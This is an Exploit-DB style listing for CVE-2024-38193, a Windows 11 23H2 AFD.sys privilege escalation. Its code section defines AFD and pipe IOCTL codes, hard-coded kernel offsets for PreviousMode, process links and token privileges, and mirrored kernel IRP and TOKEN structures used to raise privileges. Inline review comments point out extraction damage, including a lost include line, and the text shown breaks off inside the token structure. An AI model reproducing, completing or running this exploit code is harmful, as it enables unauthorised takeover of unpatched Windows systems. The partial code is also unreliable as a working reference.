Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation

Exploit Details

Basic Information

Exploit Title Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation
Exploit ID EDB-ID:52284
Type exploitdb
Published 2025-05-09T00:00:00
Modified 2025-05-09T00:00:00

CVSS Information

CVSS Score 7.8
Severity HIGH
Vector CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE Information

  • CVE-2024-38193

Exploit Description

Exploit Title: Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation Date: 2025-05-05 Exploit Author: Milad Karimi (Ex3ptionaL) Contact:…

Exploit Code

# Exploit Title: Microsoft Windows 11 Pro 23H2 – Ancillary Function Driver for WinSock Privilege Escalation

# Date: 2025-05-05

# Exploit Author: Milad Karimi (Ex3ptionaL)

# Contact: [email protected]

# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL

# Tested on: Win x64

# CVE : CVE-2024-38193

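#pragma once

// Page extraction replaced the ASCII quotes of the include/lib/string literals
// with typographic quotes, which no compiler accepts; restored to ASCII here.
#include "ntstatus.h"
#include "Windows.h"
// NOTE(review): the header name on the next line was lost in page extraction
// (an angle-bracket include is read as markup); restore it from the original
// listing before building. SOCKADDR_IN / sockaddr_in further down suggest it
// was a Winsock header, but that is an inference.
#include
#pragma comment(lib, "ntdll.lib")

// Split a 64-bit value into its high / low 32-bit halves.
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

// String constants used by code outside this view. AfdOpenPacket is exactly 15
// characters, the size of AFD_CREATE_PACKET::EaName below (no room for a NUL).
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"

// AFD and named-pipe control codes as written by the author; not re-derived here.
// NOTE(review): FSCTL_PIPE_INTERNAL_WRITE lacks the LL suffix the others carry;
// harmless when passed as a ULONG, but inconsistent.
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

// Local copies of NT object-attribute / create-disposition flags and the
// NT_SUCCESS test.
// NOTE(review): these names are also defined by winternl.h / ntdef.h; including
// either alongside this file triggers macro-redefinition diagnostics.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

// Hard-coded offsets into kernel objects. The five OFFSET_IN_TOKEN_* values
// agree with the field offsets annotated in struct _TOKEN below (Privileges
// 0x40, PrimaryGroup 0xA8, DynamicPart 0xB0, DefaultDacl 0xB8, VariablePart
// 0x490); the remaining three refer to structures not declared in this file.
// All of them are specific to the Windows build the author tested ("Tested on:
// Win x64" in the header). On any other build they address unrelated memory,
// so a version mismatch corrupts kernel state instead of failing cleanly.
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8

// Pseudo-handle for the calling thread (the value GetCurrentThread() returns).
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE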

// User-mode mirror of the kernel's I/O status block; referenced further down
// through its tag (`struct IO_STATUS_BLOCK IoStatus` inside _IRP).
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
// NOTE(review): winternl.h types Status as NTSTATUS and Information as
// ULONG_PTR; DWORD / DWORD* cover the same bytes on x64 but are not the SDK
// types — confirm before mixing with SDK-declared instances.
typedef struct IO_STATUS_BLOCK
{
    union
    {
        DWORD Status;
        PVOID Pointer;
    };
    DWORD* Information;
};

//0x4 bytes (sizeof)

// 4-byte power-state context: a bit-field view and a whole-ULONG view of the
// same word. Trailing //0xNN comments are the author's offset annotations.
struct _SYSTEM_POWER_STATE_CONTEXT
{
    union
    {
        struct
        {
            ULONG Reserved1 : 8; //0x0
            ULONG TargetSystemState : 4; //0x0
            ULONG EffectiveSystemState : 4; //0x0
            ULONG CurrentSystemState : 4; //0x0
            ULONG IgnoreHibernationPath : 1; //0x0
            ULONG PseudoTransition : 1; //0x0
            ULONG KernelSoftReboot : 1; //0x0
            ULONG DirectedDripsTransition : 1; //0x0
            ULONG Reserved2 : 8; //0x0
        };
        ULONG ContextAsUlong; //0x0
    };
};

//0x4 bytes (sizeof)

// A power state viewed either as a system or a device state. Both enums come
// from headers outside this file.
union _POWER_STATE
{
    enum _SYSTEM_POWER_STATE SystemState; //0x0
    enum _DEVICE_POWER_STATE DeviceState; //0x0
};

//0x48 bytes (sizeof)

// Mirror of the kernel's IO_STACK_LOCATION (0x48 bytes per the author's note).
// `Parameters` is a union of one parameter view per major/minor function; the
// DeviceIoControl and FileSystemControl views carry the control code and the
// input/output buffer lengths. Trailing //0xNN comments are the author's field
// offsets for the tested build; pointed-to types are left incomplete here.
typedef struct _IO_STACK_LOCATION
{
    UCHAR MajorFunction; //0x0
    UCHAR MinorFunction; //0x1
    UCHAR Flags; //0x2
    UCHAR Control; //0x3
    union
    {
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT FileAttributes; //0x18
            USHORT ShareAccess; //0x1a
            ULONG EaLength; //0x20
        } Create; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
        } CreatePipe; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
        } CreateMailslot; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Read; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Write; //0x8
        struct
        {
            ULONG Length; //0x8
            struct _UNICODE_STRING* FileName; //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
            ULONG FileIndex; //0x20
        } QueryDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
        } NotifyDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18
        } NotifyDirectoryEx; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
        } QueryFile; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            struct _FILE_OBJECT* FileObject; //0x18
            union
            {
                struct
                {
                    UCHAR ReplaceIfExists; //0x20
                    UCHAR AdvanceOnly; //0x21
                };
                ULONG ClusterCount; //0x20
                VOID* DeleteHandle; //0x20
            };
        } SetFile; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* EaList; //0x10
            ULONG EaListLength; //0x18
            ULONG EaIndex; //0x20
        } QueryEa; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetEa; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } QueryVolume; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } SetVolume; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG FsControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } FileSystemControl; //0x8
        struct
        {
            union _LARGE_INTEGER* Length; //0x8
            ULONG Key; //0x10
            union _LARGE_INTEGER ByteOffset; //0x18
        } LockControl; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG IoControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } DeviceIoControl; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            ULONG Length; //0x10
        } QuerySecurity; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            VOID* SecurityDescriptor; //0x10
        } SetSecurity; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } MountVolume; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } VerifyVolume; //0x8
        struct
        {
            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
        } Scsi; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* StartSid; //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
            ULONG SidListLength; //0x20
        } QueryQuota; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetQuota; //0x8
        struct
        {
            enum _DEVICE_RELATION_TYPE Type; //0x8
        } QueryDeviceRelations; //0x8
        struct
        {
            struct _GUID* InterfaceType; //0x8
            USHORT Size; //0x10
            USHORT Version; //0x12
            struct _INTERFACE* Interface; //0x18
            VOID* InterfaceSpecificData; //0x20
        } QueryInterface; //0x8
        struct
        {
            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
        } DeviceCapabilities; //0x8
        struct
        {
            struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8
        } FilterResourceRequirements; //0x8
        struct
        {
            ULONG WhichSpace; //0x8
            VOID* Buffer; //0x10
            ULONG Offset; //0x18
            ULONG Length; //0x20
        } ReadWriteConfig; //0x8
        struct
        {
            UCHAR Lock; //0x8
        } SetLock; //0x8
        struct
        {
            enum BUS_QUERY_ID_TYPE IdType; //0x8
        } QueryId; //0x8
        struct
        {
            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
            ULONG LocaleId; //0x10
        } QueryDeviceText; //0x8
        struct
        {
            UCHAR InPath; //0x8
            UCHAR Reserved[3]; //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
        } UsageNotification; //0x8
        struct
        {
            enum _SYSTEM_POWER_STATE PowerState; //0x8
        } WaitWake; //0x8
        struct
        {
            struct _POWER_SEQUENCE* PowerSequence; //0x8
        } PowerSequence; //0x8
        struct
        {
            union
            {
                ULONG SystemContext; //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8
            };
            enum _POWER_STATE_TYPE Type; //0x10
            union _POWER_STATE State; //0x18
            enum POWER_ACTION ShutdownType; //0x20
        } Power; //0x8
        struct
        {
            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
        } StartDevice; //0x8
        struct
        {
            ULONGLONG ProviderId; //0x8
            VOID* DataPath; //0x10
            ULONG BufferSize; //0x18
            VOID* Buffer; //0x20
        } WMI; //0x8
        struct
        {
            VOID* Argument1; //0x8
            VOID* Argument2; //0x10
            VOID* Argument3; //0x18
            VOID* Argument4; //0x20
        } Others; //0x8
    } Parameters; //0x8
    struct _DEVICE_OBJECT* DeviceObject; //0x28
    struct _FILE_OBJECT* FileObject; //0x30
    // Completion callback slot; the kernel invokes it with (device, irp, context).
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38
    VOID* Context; //0x40
}IO_STACK_LOCATION;

//0x18 bytes (sizeof)

// Device-queue link record (0x18 bytes per the author's note); overlays
// DriverContext[4] inside _IRP::Tail below.
struct _KDEVICE_QUEUE_ENTRY
{
    struct _LIST_ENTRY DeviceListEntry; //0x0
    ULONG SortKey; //0x10
    UCHAR Inserted; //0x14
};

//0x58 bytes (sizeof)

// Kernel APC record (0x58 bytes per the author's note); overlays the Tail
// union of _IRP below. Offsets are the author's annotations.
struct _KAPC
{
    UCHAR Type; //0x0
    UCHAR AllFlags; //0x1
    UCHAR Size; //0x2
    UCHAR SpareByte1; //0x3
    ULONG SpareLong0; //0x4
    struct _KTHREAD* Thread; //0x8
    struct _LIST_ENTRY ApcListEntry; //0x10
    VOID* Reserved[3]; //0x20
    VOID* NormalContext; //0x38
    VOID* SystemArgument1; //0x40
    VOID* SystemArgument2; //0x48
    CHAR ApcStateIndex; //0x50
    CHAR ApcMode; //0x51
    UCHAR Inserted; //0x52
};

//0xd0 bytes (sizeof)

// Mirror of the kernel I/O request packet (0xd0 bytes per the author's note).
// Offsets are the author's annotations for the tested build.
// NOTE(review): IoStatus uses the `IO_STATUS_BLOCK` tag defined above, while
// UserIosb points at `_IO_STATUS_BLOCK` (leading underscore), which is not
// defined on this page — two tags for what is presumably one structure.
struct _IRP
{
    SHORT Type; //0x0
    USHORT Size; //0x2
    USHORT AllocationProcessorNumber; //0x4
    USHORT Reserved; //0x6
    struct _MDL* MdlAddress; //0x8
    ULONG Flags; //0x10
    union
    {
        struct _IRP* MasterIrp; //0x18
        LONG IrpCount; //0x18
        VOID* SystemBuffer; //0x18
    } AssociatedIrp; //0x18
    struct _LIST_ENTRY ThreadListEntry; //0x20
    struct IO_STATUS_BLOCK IoStatus; //0x30
    CHAR RequestorMode; //0x40
    UCHAR PendingReturned; //0x41
    CHAR StackCount; //0x42
    CHAR CurrentLocation; //0x43
    UCHAR Cancel; //0x44
    UCHAR CancelIrql; //0x45
    CHAR ApcEnvironment; //0x46
    UCHAR AllocationFlags; //0x47
    union
    {
        struct _IO_STATUS_BLOCK* UserIosb; //0x48
        VOID* IoRingContext; //0x48
    };
    struct _KEVENT* UserEvent; //0x50
    union
    {
        struct
        {
            union
            {
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58
                VOID* IssuingProcess; //0x58
            };
            union
            {
                VOID* UserApcContext; //0x60
                struct _IORING_OBJECT* IoRing; //0x60
            };
        } AsynchronousParameters; //0x58
        union _LARGE_INTEGER AllocationSize; //0x58
    } Overlay; //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68
    VOID* UserBuffer; //0x70
    // Tail: three overlapping views (overlay / APC / completion key) of the
    // same 0x58 bytes, as in the kernel definition the author mirrored.
    union
    {
        struct
        {
            union
            {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                VOID* DriverContext[4]; //0x78
            };
            struct _ETHREAD* Thread; //0x98
            CHAR* AuxiliaryBuffer; //0xa0
            struct _LIST_ENTRY ListEntry; //0xa8
            union
            {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType; //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject; //0xc0
            VOID* IrpExtension; //0xc8
        } Overlay; //0x78
        struct _KAPC Apc; //0x78
        VOID* CompletionKey; //0x78
    } Tail; //0x78
};

// TDI transport address: a length/type header followed by an inline,
// variable-length address (the [1] array is the classic trailing-array idiom).
typedef struct _TA_ADDRESS
{
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;

// TDI transport-address list: a count followed by TAAddressCount inline
// TA_ADDRESS records (only the first is declared).
typedef struct _TRANSPORT_ADDRESS
{
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;

// Counted UTF-16 string: Length / MaximumLength are byte counts, Buffer is not
// required to be NUL-terminated.
// NOTE(review): winternl.h declares the same typedef; including both is a
// redefinition error.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

// Object-manager open parameters (name, root, OBJ_* attributes, security).
// Length must hold sizeof(OBJECT_ATTRIBUTES) when passed to Nt* APIs.
// NOTE(review): winternl.h declares the same typedef; including both is a
// redefinition error.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

// One loaded-module record as returned for SystemModuleInformation.
// FullPathName is a fixed 256-byte buffer; OffsetToFileName indexes into it.
typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

// SystemModuleInformation result: Count entries follow inline (trailing-array
// idiom); callers must size the buffer from Count, not from sizeof.
typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

// One handle record from SystemExtendedHandleInformation: owning process id,
// handle value, granted access and the kernel object address.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

// SystemExtendedHandleInformation result: NumberOfHandles entries follow
// inline (trailing-array idiom); size the buffer from the count.
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

// Extended-attribute payload for opening an AFD endpoint: an EA header
// (author's comment: FILE_FULL_EA_INFORMATION) followed by the socket
// parameters. EaName[15] is sized to the 15-character AfdOpenPacket literal
// with no terminating NUL — a NUL-terminating copy would write one byte past it.
typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];
    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unkown;
} AFD_CREATE_PACKET;

// Only the thread-information class this file needs.
// NOTE(review): winternl.h also declares THREADINFOCLASS; including both clashes.
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };

// Only the two NtQuerySystemInformation classes this file needs; they pair
// with SYSTEM_MODULE_INFORMATION and SYSTEM_HANDLE_INFORMATION_EX above.
// NOTE(review): winternl.h also declares SYSTEM_INFORMATION_CLASS; including
// both clashes.
enum SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemExtendedHandleInformation = 64
};

// Event kinds for NtCreateEvent-style calls (0 = notification, 1 = synchronization).
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef enum EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
};

// Input buffer for IOCTL_AFD_BIND: share type followed by an IPv4 socket
// address. SOCKADDR_IN comes from the Winsock headers (not visible here).
typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;

// Author-defined input buffer for IOCTL_AFD_CONNECT, 16-byte aligned (C++11
// alignas, so this file is C++). Field meanings beyond the names are not
// documented on this page.
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC
// C4091); the member named `bind` shadows Winsock's bind() inside the struct.
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};

// Author-defined user-mode buffer laid out like a queued data entry: a
// LIST_ENTRY link, a security-client-context pointer, a size and a ~480 KiB
// inline payload (0x77FD0 bytes). Too large for a default stack frame; keep
// instances on the heap.
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef struct FAKE_DATA_ENTRY_QUEUE
{
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};

// Input buffer for IOCTL_AFD_LISTEN; the first field is unnamed by the author
// and the queue length sits at offset 8 after padding.
typedef struct _AFD_LISTEN_INFO {
    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;

// Mirror of the kernel's client security context: QoS, the captured client
// token pointer, access flags and the token control block.
// _SECURITY_QUALITY_OF_SERVICE and _TOKEN_CONTROL come from SDK headers.
typedef struct _SECURITY_CLIENT_CONTEXT
{
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

// ERESOURCE owner slot: owning thread plus one DWORD of count/flag state
// (MSVC-only __declspec alignment).
// NOTE(review): `___u1` starts with a double underscore, an identifier range
// reserved for the implementation.
struct __declspec(align(8)) _OWNER_ENTRY
{
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};

//0x68 bytes (sizeof)

// Mirror of the kernel executive resource lock (0x68 bytes per the author's
// note); _TOKEN::TokenLock below points at one. Offsets are the author's
// annotations.
typedef struct _ERESOURCE
{
    struct _LIST_ENTRY SystemResourcesList; //0x0
    struct _OWNER_ENTRY* OwnerTable; //0x10
    SHORT ActiveCount; //0x18
    union
    {
        USHORT Flag; //0x1a
        struct
        {
            UCHAR ReservedLowFlags; //0x1a
            UCHAR WaiterPriority; //0x1b
        };
    };
    VOID* SharedWaiters; //0x20
    VOID* ExclusiveWaiters; //0x28
    struct _OWNER_ENTRY OwnerEntry; //0x30
    ULONG ActiveEntries; //0x40
    ULONG ContentionCount; //0x44
    ULONG NumberOfSharedWaiters; //0x48
    ULONG NumberOfExclusiveWaiters; //0x4c
    VOID* Reserved2; //0x50
    union
    {
        VOID* Address; //0x58
        ULONGLONG CreatorBackTraceIndex; //0x58
    };
    ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;

//0x8 bytes (sizeof)

// 8-byte push lock: flag bits, the raw value and a pointer view of one word.
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091);
// the struct is used below through its tag.
typedef struct _EX_PUSH_LOCK
{
    union
    {
        struct
        {
            ULONGLONG Locked : 1; //0x0
            ULONGLONG Waiting : 1; //0x0
            ULONGLONG Waking : 1; //0x0
            ULONGLONG MultipleShared : 1; //0x0
            ULONGLONG Shared : 60; //0x0
        };
        ULONGLONG Value; //0x0
        VOID* Ptr; //0x0
    };
};

//0x10 bytes (sizeof)

// Lock plus hash-table pointer (0x10 bytes per the author's note).
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef struct _SEP_CACHED_HANDLES_TABLE
{
    struct _EX_PUSH_LOCK Lock; //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};

//0x8 bytes (sizeof)

// 8-byte rundown reference: count and pointer views of one word.
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef struct _EX_RUNDOWN_REF
{
    union
    {
        ULONGLONG Count; //0x0
        VOID* Ptr; //0x0
    };
};

//0x20 bytes (sizeof)

// Revocation list head, its lock and a rundown ref (0x20 bytes per the
// author's note).
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
    struct _LIST_ENTRY RevocationInfos; //0x0
    struct _EX_PUSH_LOCK Lock; //0x10
    struct _EX_RUNDOWN_REF Rundown; //0x18
};

//0xc0 bytes (sizeof)

// Mirror of the kernel logon-session record (0xc0 bytes per the author's
// note). Offsets are the author's annotations; most pointed-to types are left
// incomplete.
// NOTE(review): `typedef` with no declarator name declares nothing (MSVC C4091).
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
    struct _LUID LogonId; //0x8
    struct _LUID BuddyLogonId; //0x10
    LONGLONG ReferenceCount; //0x18
    ULONG Flags; //0x20
    struct _DEVICE_MAP* pDeviceMap; //0x28
    VOID* Token; //0x30
    struct _UNICODE_STRING AccountName; //0x38
    struct _UNICODE_STRING AuthorityName; //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
    struct _EX_PUSH_LOCK SharedDataLock; //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
    struct _EJOB* ServerSilo; //0xa0
    struct _LUID SiblingAuthId; //0xa8
    struct _LIST_ENTRY TokenList; //0xb0
};

//0x30 bytes (sizeof)

// Security-attribute list header (0x30 bytes per the author's note): a count
// and list head, repeated for the "working" set. _TOKEN::pSecurityAttributes
// below points at one.
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
    ULONG SecurityAttributeCount; //0x0
    struct _LIST_ENTRY SecurityAttributesList; //0x8
    ULONG WorkingSecurityAttributeCount; //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)

// Header of a reference-counted SID value block (0x20 bytes per the author's
// note); _TOKEN::TokenSidValues below points at one.
typedef struct _SEP_SID_VALUES_BLOCK
{
    ULONG BlockLength; //0x0
    LONGLONG ReferenceCount; //0x8
    ULONG SidCount; //0x10
    ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

//0x18 bytes (sizeof)

// Token privilege bitmasks (0x18 bytes): one 64-bit mask each for present,
// enabled and enabled-by-default privileges. Sits at _TOKEN offset 0x40, the
// value OFFSET_IN_TOKEN_TOKEN_PRIVILEGES carries at the top of the file.
struct _SEP_TOKEN_PRIVILEGES
{
    ULONGLONG Present; //0x0
    ULONGLONG Enabled; //0x8
    ULONGLONG EnabledByDefault; //0x10
};

//0x1f bytes (sizeof)

// Per-token audit policy plus a set-status byte (0x1f bytes per the author's
// note). _TOKEN_AUDIT_POLICY comes from SDK headers.
struct _SEP_AUDIT_POLICY
{
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
    UCHAR PolicySetStatus; //0x1e
};

//0x498 bytes (sizeof)

// Mirror of the kernel access-token object (0x498 bytes per the author's
// note). The OFFSET_IN_TOKEN_* macros at the top of the file equal the
// annotated offsets of Privileges (0x40), PrimaryGroup (0xa8), DynamicPart
// (0xb0), DefaultDacl (0xb8) and VariablePart (0x490). Every offset here is
// tied to the build the author tested; other builds lay the object out
// differently. Pointed-to types not declared above are left incomplete.
struct _TOKEN
{
    struct _TOKEN_SOURCE TokenSource; //0x0
    struct _LUID TokenId; //0x10
    struct _LUID AuthenticationId; //0x18
    struct _LUID ParentTokenId; //0x20
    union _LARGE_INTEGER ExpirationTime; //0x28
    struct _ERESOURCE* TokenLock; //0x30
    struct _LUID ModifiedId; //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
    ULONG SessionId; //0x78
    ULONG UserAndGroupCount; //0x7c
    ULONG RestrictedSidCount; //0x80
    ULONG VariableLength; //0x84
    ULONG DynamicCharged; //0x88
    ULONG DynamicAvailable; //0x8c
    ULONG DefaultOwnerIndex; //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
    VOID* PrimaryGroup; //0xa8
    ULONG* DynamicPart; //0xb0
    struct _ACL* DefaultDacl; //0xb8
    enum _TOKEN_TYPE TokenType; //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
    ULONG TokenFlags; //0xc8
    UCHAR TokenInUse; //0xcc
    ULONG IntegrityLevelIndex; //0xd0
    ULONG MandatoryPolicy; //0xd4
    void* LogonSession; //0xd8
    struct _LUID OriginatingLogonSession; //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308
